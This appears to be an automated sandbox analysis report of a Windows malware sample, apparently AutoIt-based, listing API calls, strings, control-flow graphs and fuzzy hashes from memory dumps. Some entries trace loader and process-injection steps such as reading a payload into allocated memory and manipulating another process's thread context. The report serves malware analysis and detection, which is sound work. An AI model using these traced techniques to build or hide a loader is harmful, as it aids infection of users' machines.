                                                                                                                control_flow_graph 983 1644350-16443fe call 1641d60 986 1644405-164442b call 1645260 CreateFileW 983->986 989 1644432-1644442 986->989 990 164442d 986->990 998 1644444 989->998 999 1644449-1644463 VirtualAlloc 989->999 991 164457d-1644581 990->991 992 16445c3-16445c6 991->992 993 1644583-1644587 991->993 995 16445c9-16445d0 992->995 996 1644593-1644597 993->996 997 1644589-164458c 993->997 1000 1644625-164463a 995->1000 1001 16445d2-16445dd 995->1001 1002 16445a7-16445ab 996->1002 1003 1644599-16445a3 996->1003 997->996 998->991 1004 1644465 999->1004 1005 164446a-1644481 ReadFile 999->1005 1010 164463c-1644647 VirtualFree 1000->1010 1011 164464a-1644652 1000->1011 1008 16445e1-16445ed 1001->1008 1009 16445df 1001->1009 1012 16445ad-16445b7 1002->1012 1013 16445bb 1002->1013 1003->1002 1004->991 1006 1644483 1005->1006 1007 1644488-16444c8 VirtualAlloc 1005->1007 1006->991 1014 16444cf-16444ea call 16454b0 1007->1014 1015 16444ca 1007->1015 1016 1644601-164460d 1008->1016 1017 16445ef-16445ff 1008->1017 1009->1000 1010->1011 1012->1013 1013->992 1023 16444f5-16444ff 1014->1023 1015->991 1020 164460f-1644618 1016->1020 1021 164461a-1644620 1016->1021 1019 1644623 1017->1019 1019->995 1020->1019 1021->1019 1024 1644501-1644530 call 16454b0 1023->1024 1025 1644532-1644546 call 16452c0 1023->1025 1024->1023 1031 1644548 1025->1031 1032 164454a-164454e 1025->1032 1031->991 1033 1644550-1644554 CloseHandle 1032->1033 1034 164455a-164455e 1032->1034 1033->1034 1035 1644560-164456b VirtualFree 1034->1035 1036 164456e-1644577 1034->1036 1035->1036 1036->986 1036->991
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01644421
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01644647
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 204039940-0
                                                                                                                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                • Instruction ID: f403300bdf574c72eadf31914e9693ec18005f5b31060cac8a6a038fe2b000e7
                                                                                                                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                • Instruction Fuzzy Hash: 43A11774E01209EBDF14DFA4C895BEEBBB5FF48305F208159E605BB281CB759A81CB94

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1114 6039d5-603a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A03
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A24
                                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 00603A38
                                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 00603A41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: ca99671675596bed7c1346a4890a48cd3b5c971d3db77a522a3c42b059aa99e6
                                                                                                                • Instruction ID: f7f77f465e31454af1a6bfa20a408baf04b28c0a9eed556a7d60f5742e992bc7
                                                                                                                • Opcode Fuzzy Hash: ca99671675596bed7c1346a4890a48cd3b5c971d3db77a522a3c42b059aa99e6
                                                                                                                • Instruction Fuzzy Hash: F2F03A70500290BEEB305B23AC48E3B3EBFD7C6F50B00112AB901A2170C2792881CAB0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1467 1644110-1644253 call 1641d60 call 1644000 CreateFileW 1474 1644255 1467->1474 1475 164425a-164426a 1467->1475 1476 164430a-164430f 1474->1476 1478 1644271-164428b VirtualAlloc 1475->1478 1479 164426c 1475->1479 1480 164428d 1478->1480 1481 164428f-16442a6 ReadFile 1478->1481 1479->1476 1480->1476 1482 16442a8 1481->1482 1483 16442aa-16442e4 call 1644040 call 1643000 1481->1483 1482->1476 1488 16442e6-16442fb call 1644090 1483->1488 1489 1644300-1644308 ExitProcess 1483->1489 1488->1489 1489->1476
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01644000: Sleep.KERNELBASE(000001F4), ref: 01644011
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01644249
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: QIKJX1T00FUIU8JB71I6LS
                                                                                                                • API String ID: 2694422964-3138833913
                                                                                                                • Opcode ID: f476498908c463afa5a012177e49fa1769d6e7c30b2503e2230fb575e4feeb4c
                                                                                                                • Instruction ID: 8f062fbce199b2a1eb7763e95c7d8562a6c062ffa054c6dd6e95f0a8e07acdea
                                                                                                                • Opcode Fuzzy Hash: f476498908c463afa5a012177e49fa1769d6e7c30b2503e2230fb575e4feeb4c
                                                                                                                • Instruction Fuzzy Hash: C751A430D04248DBEF11DBA4D855BEFBB79AF19700F004199E249BB2C1DBB90B45CBA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1491 60407c-604092 1492 604098-6040ad call 607a16 1491->1492 1493 60416f-604173 1491->1493 1496 6040b3-6040d3 call 607bcc 1492->1496 1497 63d3c8-63d3d7 LoadStringW 1492->1497 1500 63d3e2-63d3fa call 607b2e call 606fe3 1496->1500 1501 6040d9-6040dd 1496->1501 1497->1500 1509 6040ed-60416a call 622de0 call 60454e call 622dbc Shell_NotifyIconW call 605904 1500->1509 1513 63d400-63d41e call 607cab call 606fe3 call 607cab 1500->1513 1504 6040e3-6040e8 call 607b2e 1501->1504 1505 604174-60417d call 608047 1501->1505 1504->1509 1505->1509 1509->1493 1513->1509
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0063D3D7
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                • _memset.LIBCMT ref: 006040FC
                                                                                                                • _wcscpy.LIBCMT ref: 00604150
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00604160
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 3942752672-1585850449
                                                                                                                • Opcode ID: 8fcdf3d3be440f6344264514380b49bc57e439d035e9406e1b1e1d96baace58e
                                                                                                                • Instruction ID: 3863b888ffb938413e797e38b48e6b09b910944306a90016435cff9781b68be6
                                                                                                                • Opcode Fuzzy Hash: 8fcdf3d3be440f6344264514380b49bc57e439d035e9406e1b1e1d96baace58e
                                                                                                                • Instruction Fuzzy Hash: 1E31D2B14487016ED378EB60DC45FEB77DAAF40304F10491EF686921D1EF74A688CB86
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1559183368-0
                                                                                                                • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                • Instruction ID: 571237b4268a04192b08fc2eda6ab1a364195af063b9fc674ea3af0558964f22
                                                                                                                • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                • Instruction Fuzzy Hash: F051A470A00F25DBDB349E69E8806AEB7A7AF40325F24872DF826A63D0D7709D518F41
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00604DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604E0F
                                                                                                                • _free.LIBCMT ref: 0063E263
                                                                                                                • _free.LIBCMT ref: 0063E2AA
                                                                                                                  • Part of subcall function 00606A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606BAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                • API String ID: 2861923089-1757145024
                                                                                                                • Opcode ID: b5560e605b5aa0b740f0e268675b6b6cd853edeac86a2637c5c7ef1a21770fa6
                                                                                                                • Instruction ID: 0c07e3bf11481df0eb78868996a15fabd6666522006a6e1113e8057df9173df8
                                                                                                                • Opcode Fuzzy Hash: b5560e605b5aa0b740f0e268675b6b6cd853edeac86a2637c5c7ef1a21770fa6
                                                                                                                • Instruction Fuzzy Hash: 05916D719102199FCF48EFA4CC519EEB7BAFF14310F10442EE816AB2E1DB71A955CBA4
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006035A1,SwapMouseButtons,00000004,?), ref: 006035D4
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 006035F5
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 00603617
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                • Opcode ID: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
                                                                                                                • Instruction ID: 7e9163d595a6ba6cd7ec6ab4840e6cae6fe1b5410c1f754977c7b8824851b7d2
                                                                                                                • Opcode Fuzzy Hash: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
                                                                                                                • Instruction Fuzzy Hash: 83114871560228BFDB248F64DC409EFB7BEEF04741F105569E805D7350D6729E409760
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 016437BB
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01643851
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01643873
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                • Instruction ID: 4cf5a98929430355723f988d07ba03a4d62a4431bfff45468aacc6f2b9d4b822
                                                                                                                • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                • Instruction Fuzzy Hash: A962F830A142589BEB24CBA4CC51BDEB772FF58700F1091A9D20DEB394E7769E81CB59
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00604EE5: _fseek.LIBCMT ref: 00604EFD
                                                                                                                  • Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669824
                                                                                                                  • Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669837
                                                                                                                • _free.LIBCMT ref: 006696A2
                                                                                                                • _free.LIBCMT ref: 006696A9
                                                                                                                • _free.LIBCMT ref: 00669714
                                                                                                                  • Part of subcall function 00622D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00629A24), ref: 00622D69
                                                                                                                  • Part of subcall function 00622D55: GetLastError.KERNEL32(00000000,?,00629A24), ref: 00622D7B
                                                                                                                • _free.LIBCMT ref: 0066971C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                • String ID:
                                                                                                                • API String ID: 1552873950-0
                                                                                                                • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                • Instruction ID: 9c8a8a5793b2c873df15f5470ce758d045e2b7bab4cf353a94eb8d2e8630e97b
                                                                                                                • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                • Instruction Fuzzy Hash: EE516FB1D04259AFDF649F64DC81A9EBBBAEF48300F10449EF609A3341DB715A91CF58
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2782032738-0
                                                                                                                • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                • Instruction ID: e8d4f06cbccef55077fb08a736d170dae4a7cc2a4e6b951f61eeb5f3b6784244
                                                                                                                • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                • Instruction Fuzzy Hash: 9B41C234A00F669BDB18CF69E8809EA7BA7AF45360B24817DE82587740DF74DD418F40
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 006044CF
                                                                                                                  • Part of subcall function 0060407C: _memset.LIBCMT ref: 006040FC
                                                                                                                  • Part of subcall function 0060407C: _wcscpy.LIBCMT ref: 00604150
                                                                                                                  • Part of subcall function 0060407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00604160
                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 00604524
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00604533
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0063D4B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378193009-0
                                                                                                                • Opcode ID: f33790376940728bc86506f4ae630f30669bc03d603ac89a67628e9762ed6384
                                                                                                                • Instruction ID: 400f452105b21ce3d7441b2c2326801afcd43aa2e7df01c038bb55536a2b0873
                                                                                                                • Opcode Fuzzy Hash: f33790376940728bc86506f4ae630f30669bc03d603ac89a67628e9762ed6384
                                                                                                                • Instruction Fuzzy Hash: FA210AB0944784AFE7338B249C55BE7BBEE9F01304F04049EE79E57282C7742A84CB41
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: AU3!P/i$EA06
                                                                                                                • API String ID: 4104443479-1974690362
                                                                                                                • Opcode ID: 6f05ad5e0493deb274746dbd111d90380be46084ac07ecbb27420be53b27dfd9
                                                                                                                • Instruction ID: 47b18d2f2bf4b15040617365fef09d43e546bfa5f363dc9a06b8284196a04db9
                                                                                                                • Opcode Fuzzy Hash: 6f05ad5e0493deb274746dbd111d90380be46084ac07ecbb27420be53b27dfd9
                                                                                                                • Instruction Fuzzy Hash: 29419BA1A8015867DF399B54C8A17FF7FA3DF41300F284468EE829B3C2DE309D4187A1
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0063EA39
                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0063EA83
                                                                                                                  • Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770
                                                                                                                  • Part of subcall function 00620791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006207B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                • String ID: X
                                                                                                                • API String ID: 3777226403-3081909835
                                                                                                                • Opcode ID: f6bb38033efee6ad26c6c8ddc6227ee96a27afbd0c478a387472cde14429e453
                                                                                                                • Instruction ID: 43630469564b26793cabacee9bdebec0736dc039ce453196d5ca930832ea5c83
                                                                                                                • Opcode Fuzzy Hash: f6bb38033efee6ad26c6c8ddc6227ee96a27afbd0c478a387472cde14429e453
                                                                                                                • Instruction Fuzzy Hash: 3721A171A00258ABCB45DF94D845BEE7BFAAF49310F00401AE408AB281DBB45A89CFA5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                • Opcode ID: ab5a9dae190de4b39815a46e71a7bb799271da3c876ad52fd735476e9f25aa4d
                                                                                                                • Instruction ID: d15ef9a7260a09b3bae30256b5cce4399fd574662f818cc916b711460b5360b8
                                                                                                                • Opcode Fuzzy Hash: ab5a9dae190de4b39815a46e71a7bb799271da3c876ad52fd735476e9f25aa4d
                                                                                                                • Instruction Fuzzy Hash: 6A01F9718046287EDB68CBA8D816EFE7BFCDF11301F00419EF552D3181E874E6048B60
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 006698F8
                                                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0066990F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: ea11fd9c3719bcd356aefa710a171489ff1c3c99bf87e3bd992b8b4ce259fc21
                                                                                                                • Instruction ID: 7ce29286dea9bdc077a424b124ea3421ff4d01369b1ea275533bcec1e147a0f0
                                                                                                                • Opcode Fuzzy Hash: ea11fd9c3719bcd356aefa710a171489ff1c3c99bf87e3bd992b8b4ce259fc21
                                                                                                                • Instruction Fuzzy Hash: F8D05E7954030DBBDB609BE0DC0EFDA773DE704700F0003B1BA54D20A1EAB096988B91
                                                                                                                Memory Dump Source
